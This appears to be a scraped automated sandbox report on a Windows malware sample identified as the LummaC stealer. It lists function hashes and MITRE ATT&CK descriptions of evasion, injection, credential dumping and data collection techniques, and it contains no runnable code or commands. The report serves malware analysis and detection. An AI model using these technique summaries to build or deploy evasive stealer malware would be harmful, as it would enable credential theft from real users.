Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1255f4a16ea10230f8237e4c05ad8c588ba4ba9d264dd35e923e8e3087f5a603
Instruction ID: 2111fa9e304b48309700938602874aac4406f1930da0b205156c5b471cdf0221
Opcode Fuzzy Hash: 1255f4a16ea10230f8237e4c05ad8c588ba4ba9d264dd35e923e8e3087f5a603
Instruction Fuzzy Hash: 4F81477564C3508BC3109F28D88176BBBE1EF91318F488A2EF9D85B381E7788949C787

Function 0041D1B0 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 235c92c46c9cbdcbe51b3aeda1771464be7d14007ac81d75227bdd4b7841c705
Instruction ID: 9374f0dcfe35b385838bdc5e4bb432c203163cf561be86e4770f1d01bf1c2ca7
Opcode Fuzzy Hash: 235c92c46c9cbdcbe51b3aeda1771464be7d14007ac81d75227bdd4b7841c705
Instruction Fuzzy Hash: 50812BB2A082654FC715CE28C85139FBBD1AB95364F18823EE8F5873C2C738D94697D2

Function 0043210B Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95abf2c56a45be8f96806c7e60459892c169e1cb8f0eb65bc63737cf2a9c3ab1
Instruction ID: 41ce66d59fb3b72e70b63803f4d723d6c8e4d9b5984d2f94b5a537e5089b918e
Opcode Fuzzy Hash: 95abf2c56a45be8f96806c7e60459892c169e1cb8f0eb65bc63737cf2a9c3ab1
Instruction Fuzzy Hash: 27A12B76608B808FC3118F3CC991396BFD26F9B314F1986ADC5EA8B393C6799406C752

Function 00444680 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79641a3cc0ee827990577489ebfc85dc0d24a337a940c359287e238b71fab45e
Instruction ID: 96d12ea3d3c94a09dadfd44fb7852b0513c37639a1ae6042b5b217cdcd3fb480
Opcode Fuzzy Hash: 79641a3cc0ee827990577489ebfc85dc0d24a337a940c359287e238b71fab45e
Instruction Fuzzy Hash: CA81AE792042418BE724DF29D890B2BB3E1FFDA714F15862DE9908B3A1DB39DC15CB46

Function 00434FF0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d6063657fb697a7595840fbab93fc3afae7c127458380f4765cb05181af594a
Instruction ID: 50bce581e1b0041ce85711fc0421540756ccbf32b7296321612c510e57d28a97
Opcode Fuzzy Hash: 2d6063657fb697a7595840fbab93fc3afae7c127458380f4765cb05181af594a
Instruction Fuzzy Hash: DF71262764DED007D72C453C5C613BAAA934BD7334F2E976EE4F24B3E1C56A48068349

Function 0041F170 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d0b943f9de84774c78a780ad13b19ed83386de1e9444702bd5e4860ce26029
Instruction ID: a6ce5babd4d3766fd429a0d32157edeb31411bafb66deedf712a04b4dc43084b
Opcode Fuzzy Hash: c5d0b943f9de84774c78a780ad13b19ed83386de1e9444702bd5e4860ce26029
Instruction Fuzzy Hash: 8C615A355083949FC7258F39C85096E7BD0AF95314F0881BEE8E447392D639DC4AC756

Function 0041AB90 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1aac728ee4b4832bd396a6b465bb79e7de6bf291210a6027f85529f027abc15
Instruction ID: 96be8bd36e56bf27b6aa0d10c1fb3a2b8c76be11eb878f6b8047cc8e026e4330
Opcode Fuzzy Hash: a1aac728ee4b4832bd396a6b465bb79e7de6bf291210a6027f85529f027abc15
Instruction Fuzzy Hash: 0D5178B01093818BD310CF26C8617ABBBE1EFC6368F04595DE4D58B791E3788549CB9B

Function 0043C460 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
Instruction ID: c97da413fd5a9132ec8511ec3fb1d3aba95cfbccb1f123846b9e4f248ad7db27
Opcode Fuzzy Hash: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
Instruction Fuzzy Hash: 7E514CB19087548FE314DF29D49475BBBE1BBC8318F044A2EE4E987351E379DA088B96

Function 00437850 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422c5c46dec51ca66d6232300122104a863259cb16baaf1f2b2ece6416f4838a
Instruction ID: 48aa9a845809bd12f015dc09ae20762c45634ee2d6e6e50515cef5deddc0b902
Opcode Fuzzy Hash: 422c5c46dec51ca66d6232300122104a863259cb16baaf1f2b2ece6416f4838a
Instruction Fuzzy Hash: 6351066274D9904BD338993C4C623AA7A834BDB230F2DE37FE5F6873E1D55848069255

Function 0041A770 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1b575b9db7d3d251ac50788cacbe8e7486d039b173afaa70e00c3db702b2f36
Instruction ID: c8fa41b63414d86ae28ae5069bc9de9cc5c1be9fc68955ccb818d97c0d6e7456
Opcode Fuzzy Hash: d1b575b9db7d3d251ac50788cacbe8e7486d039b173afaa70e00c3db702b2f36
Instruction Fuzzy Hash: 935123542087904ADB00DF7588D2A3A7BF0DF48305B0960DFD898DF7A7E638D2168B8E

Function 00402210 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c7e2a066f6d9e345ae6dd4228410094820ea6aa83ba62684cec3428317f83b8
Instruction ID: ddd3a1f12e0d028ceadd4f9d033f63418dc44a780f61091206b315d12a6ba213
Opcode Fuzzy Hash: 5c7e2a066f6d9e345ae6dd4228410094820ea6aa83ba62684cec3428317f83b8
Instruction Fuzzy Hash: 955182B18007059BD3209F68AD48717B7B4BB41328F14073DECA5A73E1E779EA15CB8A

Function 0043CD40 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
Instruction ID: 21a2246a7d2b4b35dc494bba2f4b78631a10c89df9ac8d713cd23d0779d29278
Opcode Fuzzy Hash: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
Instruction Fuzzy Hash: D4310372B456104BC318DA29CC823ABB7D297C9324F0AD63AE898D73D4E63CCC418791

Function 00408D10 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
Instruction ID: 4bae2713ce7709fe8da5589f50bc1a219f305d3d105056fe83fc3629ebc2cdfc
Opcode Fuzzy Hash: bcaeed6e48b24ae2a8cd28d1105d407858c563e08032dd46f6af0fe4f131f9e0
Instruction Fuzzy Hash: 3431B633A219114BE314CA29CD4479632D2ABD8328F3E86B99465DF7D2DD3B9D0386C0

Function 0043E520 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
Instruction ID: 1389e4d53b694fd295f4c99b563822772ee8ec12a6424706be6842d5b3f5de1d
Opcode Fuzzy Hash: a2a4d5fd578bd396aa0af15cb6ab0e54a13c3b7b2a9c76c21a4d61f111652cf1
Instruction Fuzzy Hash: 40311973A197144FC3289D7D889015BBB929BD5334F2A873EDAB54B3C1DE748C015786

Function 0041B021 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
Instruction ID: 6c2a7a40945fba97b60b2dc016bc6914b469ce470df0d3b36ab1ee23dd066ef4
Opcode Fuzzy Hash: fbbfd85ed4625c5c4a602328de8fb4c924b8bb4c62c88757fd3e9dc444327da8
Instruction Fuzzy Hash: 763159759483819BD718CB34C8A13BBBBD19B97318F189A2DE0E193391D338C5468B5B

Function 0042E9B0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
Instruction ID: debfc5dd17bc83b4888ed899efee17c0fbb67269f2955dd3302a8cbeb79cd110
Opcode Fuzzy Hash: aec1cfbcc0f08cee27abf22853a84cb241b0a967adefa26a82fd7ec6fe8abb82
Instruction Fuzzy Hash: 1B312673E21A380BC7088D3D9C1126A75829BD5265B9EC37DEDAADF3C2DA35DC0582D0

Function 00431AF5 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
Instruction ID: c3ef201410797beedfbb423dd4b6a4b613f7a1191b873fa7b6aad00fbf48a4bb
Opcode Fuzzy Hash: 41305cf3b9d177b5ddb8f36fbe4dc537e4b4ae08f3accfdb3d01e3decd18bcb9
Instruction Fuzzy Hash: D3210B6590D3C146D7394B3A44243B7EFE25FE7345F2C58AED0D987392DA798005871A

Function 00408320 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
Instruction ID: b0168b037b63377ee53a696943b9184fc20a9d47a10823b489a3532680c59eb7
Opcode Fuzzy Hash: 080992afd48c0527231705f8ceffc0aba193dc8929bd9ea4cd8631f6a582b227
Instruction Fuzzy Hash: 7B314B2290D6F30EC336892D449047E7AA05AE621472943FFDCF19B3C3C52AC94587E5

Function 00402B40 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
Instruction ID: ac5a2fd1a34d00fe81212d9a0dd75a5008a32a6ff7d51fa23ef38769660ba55c
Opcode Fuzzy Hash: ef136d90a11ccdb0dce14e10ad2ebc64eaa621fdbac3e539be7e273f88757557
Instruction Fuzzy Hash: 392129B971A1A10BD700DF399DD412B77A2D7C730671F4577DA80D3392C27AE80AC225

Function 0041B3F2 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction ID: f625d5dc7cc146dca826755e11d0e3d06b3d9b76c6b30af6ca5c7fe59dabf8e9
Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92

Function 0043A230 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A

Function 0042C5E0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD

Function 00440A90 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
Instruction ID: 7b6863c9c9260bd0558c6f806dd5f9e3415f7290086a878cc0b8c3271b95cfd7
Opcode Fuzzy Hash: 88e438cc32f6b5a12cb4a8709c5ccb5f2cf69f7e5815e22606a40b63f7bc33cd
Instruction Fuzzy Hash: 6EF0F936544304ABE1105B459C40D3777AEFB9E728F104319F715332A1E772ED2197A9

Function 0041F3E0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 65b04920acd8ec40befbc16cdab85cd19ddd64fc0dfac740f80379ed40623b4a
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 7CD0A7715487B50E57588D3C44A04BBFBE8E987712B1814AFE8D6E3206D225DC47469D

Function 00425560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D

Strings

MO, xrefs: 00425572
p:#, xrefs: 00425647
$%, xrefs: 004255A6

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: $%$p:#$MO
API String ID: 237503144-3521940197
Opcode ID: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction ID: 81944db62257c61826c9772faf3d9c506449667b4075365b7c5b7f4bc0eeec7d
Opcode Fuzzy Hash: 23a9facff3ed32d27b45f5c78396115d40fb07a2703201d84f017c1d29451edb
Instruction Fuzzy Hash: 6141DF365183448FE310CF24C88475FBBE2FFC5758F16892CE4D49B680D6B9CA0A8B86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

